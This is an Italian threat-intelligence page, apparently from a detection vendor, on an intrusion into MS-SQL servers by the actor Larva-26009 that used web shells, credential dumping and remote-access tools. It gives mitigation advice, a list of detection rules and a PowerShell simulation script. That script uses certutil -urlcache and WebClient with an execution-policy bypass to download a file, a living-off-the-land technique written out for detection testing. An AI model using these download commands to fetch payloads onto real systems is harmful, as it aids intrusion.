Intrusione nel server MS SQL utilizza GoToHTTP e SoftEther VPN per l’accesso remoto
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Un attore di minaccia tracciato come Larva-26009 ha preso di mira i server MS-SQL per distribuire diversi payload di malware, tra cui XMRig CoinMiner e SoftEther VPN. L’intrusione ha comportato l’installazione di web shell per la persistenza, il furto di credenziali tramite il dump del registro e l’uso di diverse utility di escalation dei privilegi. L’attaccante ha anche utilizzato caricatori specializzati e file crittografati per eludere i meccanismi di rilevamento della sicurezza tradizionali.
Indagine
Il Centro di Intelligenza della Sicurezza AhnLab (ASEC) ha rilevato l’intrusione mentre monitorava l’attività di attacco che prendeva di mira i server MS-SQL. L’indagine ha scoperto l’uso di certutil.exe per decrittare i file delle web shell, insieme ad attività da riga di comando associata al dump delle credenziali e al movimento laterale. I ricercatori hanno anche documentato diversi strumenti di escalation dei privilegi in stile Potato e caricamenti di shellcode specializzati, inclusi RingQ.
Mitigazione
Gli amministratori dovrebbero imporre password forti, complesse e regolarmente ruotate per tutti gli account di servizio dei database per ridurre il rischio di attacchi brute-force. I server di database dovrebbero essere protetti da firewall che limitano l’accesso pubblico e minimizzano la superficie di attacco esposta. Anche i software di sicurezza e le soluzioni di protezione degli endpoint dovrebbero essere costantemente aggiornati per rilevare firme di malware conosciute e attività dannose correlate.
Risposta
Se viene rilevata attività dannosa, i team di sicurezza dovrebbero isolare immediatamente i server MS-SQL compromessi e i server web IIS per prevenire ulteriori movimenti laterali. I rispondenti dovrebbero controllare gli account utente creati di recente, in particolare quelli che utilizzano schemi di nomi sospetti come i nomi che terminano con $. Inoltre, dovrebbe essere eseguita la forense della memoria per identificare shellcode iniettato e scoprire servizi VPN o di desktop remoto non autorizzati in esecuzione sui sistemi compromessi.
Flusso di Attacco
Rilevamenti
Download o Upload tramite Powershell (via cmdline)
Visualizza
Stringhe Powershell Sospette (via cmdline)
Visualizza
Possibile Enumerazione o Manipolazione di Account o Gruppi (via cmdline)
Visualizza
Possibile Esecuzione di Comandi tramite Procedura Memorizzata Estesa di SQL xp_cmdshell (via cmdline)
Visualizza
Possibile Uso di PING per Esecuzione Ritardata (via cmdline)
Visualizza
Uso di Certutil per Codifica Dati e Operazioni Cert (via cmdline)
Visualizza
LOLBAS Bitsadmin (via cmdline)
Visualizza
Possibile Dumping di SAM/SYSTEM/SECURITY (via cmdline)
Visualizza
Chiamata a Metodi .NET Sospetti da Powershell (via powershell)
Visualizza
Possibile Abuso di Dominio di Sviluppo Cloudflare (via dns)
Visualizza
IOC (HashMd5) per rilevare: Studio di Caso: Attacco Mirato su un Server MS-SQL che Coinvolge l’Installazione di GotoHTTP e SoftEther VPN
Visualizza
IOC (SourceIP) per rilevare: Studio di Caso: Attacco Mirato su un Server MS-SQL che Coinvolge l’Installazione di GotoHTTP e SoftEther VPN
Visualizza
IOC (DestinationIP) per rilevare: Studio di Caso: Attacco Mirato su un Server MS-SQL che Coinvolge l’Installazione di GotoHTTP e SoftEther VPN
Visualizza
Rilevare Esecuzione Remota di Script tramite Certutil e PowerShell [Windows Powershell]
Visualizza
Indicatori di Attacco Mirato al Server MS-SQL [Creazione Processo Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria & Baseline deve essere passato.
Ragione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrazione & Comandi dell’Attacco: L’avversario ha ottenuto l’accesso iniziale e intende scaricare un payload di seconda fase per stabilire la persistenza. Per evitare sospetti, decidono di utilizzare tecniche “Living-off-the-Land” (LotL). Proveranno due metodi: primo, usando
certutil.exeper scaricare un file tramite il flag-urlcache, e secondo, utilizzando una chiamata legacySystem.Net.WebClientin PowerShell. Questo imita un attaccante che tenta di integrarsi con il traffico amministrativo legittimo mentre scarica strumenti. -
Script di Test di Regressione:
# Script di Simulazione per Rilevamento Download di Certutil e PowerShell # Nota: Questo script tenta di scaricare un file di testo innocuo da un URL pubblico. $TargetUrl = "https://raw.githubusercontent.com/socprime/test-payloads/main/test.txt" $LocalPathCertutil = "$env:TEMPcertutil_download.txt" $LocalPathPS = "$env:TEMPps_download.txt" Write-Host "[+] Avvio Simulazione..." -ForegroundColor Cyan # Metodo 1: Download Certutil URL Cache Write-Host "[*] Esecuzione tecnica di download Certutil..." -ForegroundColor Yellow Start-Process "certutil.exe" -ArgumentList "-urlcache -split -f $TargetUrl $LocalPathCertutil" -NoNewWindow -Wait # Metodo 2: Download PowerShell WebClient Write-Host "[*] Esecuzione tecnica PowerShell WebClient..." -ForegroundColor Yellow powershell.exe -ExecutionPolicy Bypass -Command "(new-object System.Net.WebClient).DownloadFile('$TargetUrl', '$LocalPathPS')" Write-Host "[+] Comandi di Simulazione Eseguiti." -ForegroundColor Green -
Comandi di Pulizia:
# Script di Pulizia Remove-Item -Path "$env:TEMPcertutil_download.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPps_download.txt" -ErrorAction SilentlyContinue Write-Host "[+] Pulizia Completata." -ForegroundColor Green